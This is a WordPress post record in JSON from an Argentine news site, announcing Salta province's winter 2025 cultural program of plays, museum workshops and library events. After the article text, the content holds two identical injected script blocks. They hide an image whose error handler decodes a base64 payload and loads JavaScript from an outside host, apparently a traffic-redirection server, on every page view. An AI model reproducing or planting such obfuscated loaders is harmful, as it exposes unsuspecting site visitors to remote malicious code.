{"id":5318,"date":"2025-07-10T08:31:58","date_gmt":"2025-07-10T11:31:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5318"},"modified":"2025-08-13T23:27:18","modified_gmt":"2025-08-14T02:27:18","slug":"modo-invierno-2025-vacaciones-en-cultura-despliega-mas-de-140-actividades-para-todas-las-edades","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5318","title":{"rendered":"Modo Invierno 2025: Vacaciones en Cultura despliega m\u00e1s de 140 actividades para todas las edades"},"content":{"rendered":"\n<p><strong><em>Del 12 al 27 de julio, museos, talleres y espect\u00e1culos animan las vacaciones de invierno. Conoc\u00e9 las m\u00e1s de 80 propuestas para jugar, crear y aprender en toda la provincia.<\/em><\/strong><\/p>\n\n\n\n<p>En Casa de la Cultura, se llev\u00f3 a cabo el anuncio de las actividades culturales que tendr\u00e1n lugar durante el receso de invierno en la Provincia de Salta. En esta ocasi\u00f3n,&nbsp;<strong>el secretario de Cultura, Diego Ashur M\u00e1s,<\/strong>&nbsp;junto al subsecretario de Gesti\u00f3n Cultural, Miguel Dallacamin\u00e1; y la subsecretaria de Patrimonio Cultural, Claudia Lamas, distinguieron los elencos que fueron seleccionados para llevar adelante diferentes propuestas teatrales durante las semanas de receso escolar en Salta.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18276-conferencia.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18276-conferencia.webp\" alt=\"Conferencia\"\/><\/a><\/figure>\n\n\n\n<p>En esta edici\u00f3n, Vacaciones en Cultura incluir\u00e1 cuatro obras seleccionadas por su calidad art\u00edstica y su capacidad de conmover y entretener con recursos diversos como el teatro f\u00edsico, las artes circenses, la m\u00fasica en vivo y el folklore. Las obras seleccionadas para integrar la programaci\u00f3n de invierno en la Usina Cultural son cuatro propuestas teatrales destinadas a las infancias y al p\u00fablico familiar. Las obras son: \u201cFantas\u00eda o Realidad\u201d, una pieza de artes circenses dirigida por Ra\u00fal Eduardo Rodr\u00edguez, presenta a cinco duendes que, con humor, m\u00fasica y acrobacias, intentan construir un enigm\u00e1tico invento; \u201cWayra, guardi\u00e1n del carnaval dormido\u201d, de Gabriel Nicol\u00e1s Obreg\u00f3n, es una obra que fusiona teatro f\u00edsico, clown y elementos rituales para narrar el viaje de un duende andino que busca despertar el carnaval ancestral; \u201cUn mundo de aventura\u201d, dirigida por Daniel Vicente Pulitta, combina teatro, danza y leyendas del folklore argentino para reflexionar sobre la diversidad cultural, con un emotivo segmento dedicado a la historia real de P\u00eda; Finalmente, \u201cLa F\u00e1brica de Sue\u00f1os 2\u201d, de Nicol\u00e1s Mart\u00ednez, es una fantas\u00eda \u00e9pica que aborda el poder transformador del amor y los sue\u00f1os frente a la oscuridad, en el contexto de un conflicto que pone en riesgo el equilibrio del mundo on\u00edrico.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18277-conferencia.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18277-conferencia.webp\" alt=\"Conferencia\" style=\"width:409px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Durante el lanzamiento, el secretario de Cultura, Diego Ashur M\u00e1s destaco la variedad de las propuestas y el trabajo en equipo llevado adelante para concretar m\u00e1s de 140 actividades para toda la familia: \u201cSeleccionamos obras que no solo entretienen, sino que tambi\u00e9n invitan a reflexionar, a conectarse con nuestras ra\u00edces, con las emociones y con el valor del arte como herramienta de transformaci\u00f3n. Queremos que cada funci\u00f3n sea una oportunidad para que ni\u00f1os, ni\u00f1as y adultos vivan juntos la magia del teatro y se lleven algo m\u00e1s que un buen recuerdo: una historia que los inspire\u201d. Asimismo, expres\u00f3: \u201cDesde el Gobierno de la Provincia impulsamos una programaci\u00f3n que crece todos los a\u00f1os pensada para las infancias y las familias salte\u00f1as, con espect\u00e1culos que conjugan creatividad, identidad y valores. Creemos que el arte es una herramienta fundamental para el desarrollo integral de las personas, y por eso apostamos a una agenda diversa, accesible y representativa de nuestra riqueza cultural\u201d.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18278-conferencia.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18278-conferencia.webp\" alt=\"Conferencia\" style=\"width:398px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>El s\u00e1bado\u202f12 de julio, la programaci\u00f3n inicia con la apertura gratuita de los museos provinciales para los ciudadanos y residentes salte\u00f1os; una misa en honor a la Virgen del\u202fCarmen y la Virgen del\u202fValle en el Mercado\u202fArtesanal (11\u202fh, Av.\u202fSan\u202fMart\u00edn\u202f2555). En paralelo, el Museo\u202fG\u00fcemes abre un rinc\u00f3n l\u00fadico para infancias que funcionar\u00e1 del\u202f12 al\u202f27 de\u202f11\u202fa\u202f19\u202fhs con carteler\u00eda interactiva, rompecabezas y l\u00e1minas para colorear. El Museo&nbsp;de Bellas Artes Lola&nbsp;Mora proyectar\u00e1 cada s\u00e1bado de julio, a las\u202f11\u202fhs, los documentales \u00abArtistas de\u202fColecci\u00f3n\u00bb de Jorge\u202fBarbatti, mientras que el Museo de\u202fAntropolog\u00eda propone a las\u202f17\u202fh el taller \u00abGuardianes del&nbsp;Monte\u00bb, donde ni\u00f1as y ni\u00f1os de\u202f7 a\u202f11\u202fa\u00f1os descubren la cosmovisi\u00f3n del Gran\u202fChaco mediante m\u00e1scaras y juegos creativos. Hasta el\u202f8\u202fde\u202fagosto, el MAAM Viajero recorre el Museo de\u202fCiencias\u202fNaturales de Campamento&nbsp;Vespucio (9\u202fa\u202f17\u202fh) con videos y fotograf\u00edas de alto impacto sobre la vida andina, y el Museo P\u00edo\u202fPablo\u202fD\u00edaz de\u202fCachi invita a convertirse en \u00abExploradores del\u202fPasado\u00bb con actividades de b\u00fasqueda de tesoros arqueol\u00f3gicos, modelado y tocados incaicos, abiertas de\u202f9\u202fa\u202f16\u202fhs.&nbsp;<br><br>El domingo\u202f13 contar\u00e1 con actividades para toda la familia en el espacio recreativo del Museo\u202fG\u00fcemes; como as\u00ed tambi\u00e9n se sostendr\u00e1 la muestra ambulante del\u202fMAAM en el Museo de Campamento Vespucio, mientras que el Mercado\u202fArtesanal en Av. San Mart\u00edn 2555 a\u00f1adir\u00e1 a su agenda convite de mate cocido y panificados caseros de\u202f10 a\u202f12 y de\u202f16 a\u202f18h para quienes deseen recorrer sus salones de artesan\u00edas aut\u00e9nticas y gastronom\u00eda regional.<\/p>\n\n\n\n<p>El lunes\u202f14, la Biblioteca\u202fProvincial, ubicada en Av.\u202fBelgrano\u202f1002, ofrecer\u00e1 a las\u202f11h el primer encuentro infantil con mandalas a cargo de Roxana Pardo y, simult\u00e1neamente, un taller de aproximaci\u00f3n al braille de la Prof.\u202fGabriela\u202fCastillo a las 10\u202fa\u202f11.30\u202fh, cupo:\u202f10\u202fni\u00f1os con acompa\u00f1ante.El martes\u202f15, el Mercado\u202fArtesanal festejar\u00e1 su 57.\u00ba\u202faniversario con m\u00fasica, danza y degustaciones de\u202f10\u202fa\u202f15\u202fh; el Ballet\u202fFolkl\u00f3rico inicia su segundo ciclo anual de capacitaci\u00f3n en la Casa de la\u202fCultura, con clases que van del pilates especializado a las danzas tradicionales para adultos mayores; En la Usina\u202fCultural, Espa\u00f1a 1-98, se dictar\u00e1 el taller \u00abDise\u00f1o de criaturas fant\u00e1sticas\u00bb desde las 15\u202fh. La obra de teatro infantil, una de las distinguidas durante el lanzamiento, \u00abFantas\u00eda o\u202frealidad\u00bb propondr\u00e1 para todo p\u00fablico una aventura circense donde cinco duendes, entre acrobacias y m\u00fasica, inventan un artefacto asombroso y retan al p\u00fablico a descifrar su secreto en el Teatro de la Usina Cultural desde las 17.30\u202fh; y la obra \u00abUn Mundo de\u202fAventura\u00bb, que combina teatro, m\u00fasica y danza para celebrar la diversidad argentina desde las 19\u202fh tambi\u00e9n en el teatro de la Usina.En la Biblioteca Provincial, Av. Belgrano 1002, se suman los talleres gratuitos \u00abRecorto y pego\u00bb para peque\u00f1os de\u202f3 a\u202f5\u202fa\u00f1os&nbsp; a partir de las 11\u202fh e \u00abHistorietas y microcuentos\u00bb para curiosos de\u202f7 a\u202f12\u202fa\u00f1os desde las 17.30\u202fh. Asimismo, tendr\u00e1 lugar el taller \u00abReciclando con\u202fEmi\u00bb a las 16.30\u202fh. Finalmente, en Rosario de la Frontera, el Museo Quinquela Mart\u00edn abrir\u00e1 su taller de porcelana fr\u00eda \u00abFantas\u00edas animadas\u00bb que se dictar\u00e1 de 15\u202fa\u202f17\u202fh.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18279-conferencia.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18279-conferencia.webp\" alt=\"Conferencia\"\/><\/a><\/figure>\n\n\n\n<p>Conoc\u00e9 la programaci\u00f3n para la primera semana ingresando a&nbsp;<a href=\"http:\/\/culturasalta.gov.ar\/\">http:\/\/culturasalta.gov.ar\/<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Video Relacionado<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-gestor-del-servicio wp-block-embed-gestor-del-servicio wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<div class=\"youtube-embed\" data-video_id=\"M-I-q4dD3mw\"><iframe title=\"Modo Invierno 2025: Vacaciones en Cultura despliega m\u00e1s de 140 actividades para todas las edades\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/M-I-q4dD3mw?feature=oembed&#038;enablejsapi=1\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<\/div><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 12 al 27 de julio, museos, talleres y espect\u00e1culos animan las vacaciones de invierno. Conoc\u00e9 las m\u00e1s de 80 propuestas para jugar, crear y aprender en toda la provincia. En Casa de la Cultura, se llev\u00f3 a cabo el anuncio de las actividades culturales que tendr\u00e1n lugar durante el receso de invierno en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5320,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-5318","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5318"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5318"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5318\/revisions"}],"predecessor-version":[{"id":6444,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5318\/revisions\/6444"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5320"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}